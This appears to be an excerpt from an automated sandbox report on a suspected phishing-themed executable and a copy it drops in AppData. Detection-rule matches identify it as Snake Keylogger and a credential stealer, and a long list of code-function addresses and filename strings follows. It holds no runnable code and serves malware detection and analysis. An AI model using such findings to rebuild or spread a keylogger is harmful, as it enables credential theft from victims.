Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 0_2_01383E40	0_2_01383E40
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 0_2_01386F90	0_2_01386F90
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 0_2_0138DA7C	0_2_0138DA7C
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 0_2_07344431	0_2_07344431
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E4F007	9_2_00E4F007
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E4C190	9_2_00E4C190
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E46108	9_2_00E46108
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E4B328	9_2_00E4B328
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E4C470	9_2_00E4C470
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E4C751	9_2_00E4C751
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E46730	9_2_00E46730
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E49858	9_2_00E49858
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E44AD9	9_2_00E44AD9
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E4CA31	9_2_00E4CA31
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E4BBD2	9_2_00E4BBD2
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E4BEB0	9_2_00E4BEB0
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E43570	9_2_00E43570
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E4E528	9_2_00E4E528
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_00E4E517	9_2_00E4E517
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_05098460	9_2_05098460
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_050911C0	9_2_050911C0
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_05090040	9_2_05090040
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_05093870	9_2_05093870
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_05097B70	9_2_05097B70
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_05090D51	9_2_05090D51
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509ED50	9_2_0509ED50
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_05090D60	9_2_05090D60
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509ED60	9_2_0509ED60
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509BD88	9_2_0509BD88
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509BD98	9_2_0509BD98
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_05097D90	9_2_05097D90
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509DC00	9_2_0509DC00
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_05090490	9_2_05090490
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_050904A0	9_2_050904A0
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509E4A0	9_2_0509E4A0
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509E4B0	9_2_0509E4B0
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509B4D7	9_2_0509B4D7
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509B4E8	9_2_0509B4E8
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509D798	9_2_0509D798
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509D7A8	9_2_0509D7A8
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509F600	9_2_0509F600
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509F610	9_2_0509F610
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509C638	9_2_0509C638
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509C648	9_2_0509C648
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509CEEA	9_2_0509CEEA
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509CEF8	9_2_0509CEF8
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509E908	9_2_0509E908
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_05090900	9_2_05090900
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509B930	9_2_0509B930
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509B940	9_2_0509B940
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509F1A9	9_2_0509F1A9
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509F1B8	9_2_0509F1B8
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_050911B0	9_2_050911B0
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509C1E0	9_2_0509C1E0
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509C1F0	9_2_0509C1F0
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_05090007	9_2_05090007
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509E049	9_2_0509E049
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509E058	9_2_0509E058
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_05093860	9_2_05093860
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509E8F8	9_2_0509E8F8
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_050908F0	9_2_050908F0
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509D340	9_2_0509D340
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509D350	9_2_0509D350
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_050973D8	9_2_050973D8
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_050973E8	9_2_050973E8
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509DBF1	9_2_0509DBF1
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509FA59	9_2_0509FA59
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509FA68	9_2_0509FA68
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509CA90	9_2_0509CA90
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Code function: 9_2_0509CAA0	9_2_0509CAA0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 10_2_02AB3E40	10_2_02AB3E40
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 10_2_02AB6F90	10_2_02AB6F90
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 10_2_02ABDA7C	10_2_02ABDA7C
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 10_2_05172171	10_2_05172171
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 10_2_05170518	10_2_05170518
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 10_2_05170509	10_2_05170509
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 10_2_0701C6D8	10_2_0701C6D8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 10_2_0701C2A0	10_2_0701C2A0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 10_2_0701DF28	10_2_0701DF28
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 10_2_0701ECD0	10_2_0701ECD0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 10_2_0701ECE0	10_2_0701ECE0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 10_2_0701CB20	10_2_0701CB20
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B4B328	14_2_02B4B328
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B4F007	14_2_02B4F007
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B4C190	14_2_02B4C190
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B46108	14_2_02B46108
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B4C752	14_2_02B4C752
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B4C470	14_2_02B4C470
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B44AD9	14_2_02B44AD9
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B4CA32	14_2_02B4CA32
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B4BBD2	14_2_02B4BBD2
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B46880	14_2_02B46880
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B49858	14_2_02B49858
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B4BEB0	14_2_02B4BEB0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B4B4F2	14_2_02B4B4F2
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B4E528	14_2_02B4E528
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B4E517	14_2_02B4E517
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_02B43572	14_2_02B43572
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B7D90	14_2_057B7D90
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B3870	14_2_057B3870
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B8460	14_2_057B8460
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B0D60	14_2_057B0D60
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BED60	14_2_057BED60
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B0D51	14_2_057B0D51
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BED50	14_2_057BED50
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BB940	14_2_057BB940
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BB930	14_2_057BB930
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BE908	14_2_057BE908
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B0900	14_2_057B0900
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BC1F0	14_2_057BC1F0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BC1E0	14_2_057BC1E0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B11C0	14_2_057B11C0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BF1B8	14_2_057BF1B8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B11B0	14_2_057B11B0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BF1A9	14_2_057BF1A9
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BBD98	14_2_057BBD98
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BBD88	14_2_057BBD88
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B3860	14_2_057B3860
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BE058	14_2_057BE058
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BE049	14_2_057BE049
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B0040	14_2_057B0040
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B0039	14_2_057B0039
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BDC00	14_2_057BDC00
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BE8F8	14_2_057BE8F8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B08F0	14_2_057B08F0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BB4E8	14_2_057BB4E8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BB4D7	14_2_057BB4D7
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BE4B0	14_2_057BE4B0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B04A0	14_2_057B04A0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BE4A0	14_2_057BE4A0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B0490	14_2_057B0490
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BD350	14_2_057BD350
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BD340	14_2_057BD340
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BDBF1	14_2_057BDBF1
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057B73E8	14_2_057B73E8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BD7A8	14_2_057BD7A8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BD798	14_2_057BD798
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BFA68	14_2_057BFA68
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BFA59	14_2_057BFA59
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BC648	14_2_057BC648
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BC638	14_2_057BC638
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BF610	14_2_057BF610
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BF600	14_2_057BF600
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BCEF8	14_2_057BCEF8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BCEEA	14_2_057BCEEA
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_057BCAA0	14_2_057BCAA0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699B6E8	14_2_0699B6E8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06998608	14_2_06998608
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699AA58	14_2_0699AA58
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699D670	14_2_0699D670
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699C388	14_2_0699C388
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06998BF2	14_2_06998BF2
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699B0A0	14_2_0699B0A0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699A408	14_2_0699A408
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699D028	14_2_0699D028
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_069911A0	14_2_069911A0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699C9D8	14_2_0699C9D8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699BD38	14_2_0699BD38
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699F292	14_2_0699F292
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06995EB8	14_2_06995EB8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699F2A0	14_2_0699F2A0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699B6D9	14_2_0699B6D9
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06995EC8	14_2_06995EC8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06995618	14_2_06995618
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699560A	14_2_0699560A
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06998602	14_2_06998602
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699AA48	14_2_0699AA48
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06995A70	14_2_06995A70
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06995A60	14_2_06995A60
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699D663	14_2_0699D663
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_069933B8	14_2_069933B8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_069933A8	14_2_069933A8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06996BD0	14_2_06996BD0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06996BC1	14_2_06996BC1
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699A3F8	14_2_0699A3F8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06996312	14_2_06996312
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06993730	14_2_06993730
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06996320	14_2_06996320
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06996778	14_2_06996778
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699C378	14_2_0699C378
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699676A	14_2_0699676A
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06990498	14_2_06990498
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06997497	14_2_06997497
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06990488	14_2_06990488
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699B08F	14_2_0699B08F
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_069974A8	14_2_069974A8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_069978F0	14_2_069978F0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_069908F0	14_2_069908F0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_069908E0	14_2_069908E0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06992818	14_2_06992818
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699D018	14_2_0699D018
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06992807	14_2_06992807
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06990006	14_2_06990006
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06994430	14_2_06994430
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06997050	14_2_06997050
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06997049	14_2_06997049
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06990040	14_2_06990040
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06995198	14_2_06995198
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06991191	14_2_06991191
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699518E	14_2_0699518E
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_069981B0	14_2_069981B0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_069981A0	14_2_069981A0
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699C9C8	14_2_0699C9C8
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06997900	14_2_06997900
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06990D39	14_2_06990D39
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_0699BD28	14_2_0699BD28
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06997D58	14_2_06997D58
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06990D48	14_2_06990D48
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Code function: 14_2_06997D48	14_2_06997D48

Source: HBL NO C-ACC-250002.exe, 00000000.00000000.2048135331.0000000000962000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesPTL.exe2 vs HBL NO C-ACC-250002.exe
Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2094250259.00000000054F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs HBL NO C-ACC-250002.exe
Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2091660215.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs HBL NO C-ACC-250002.exe
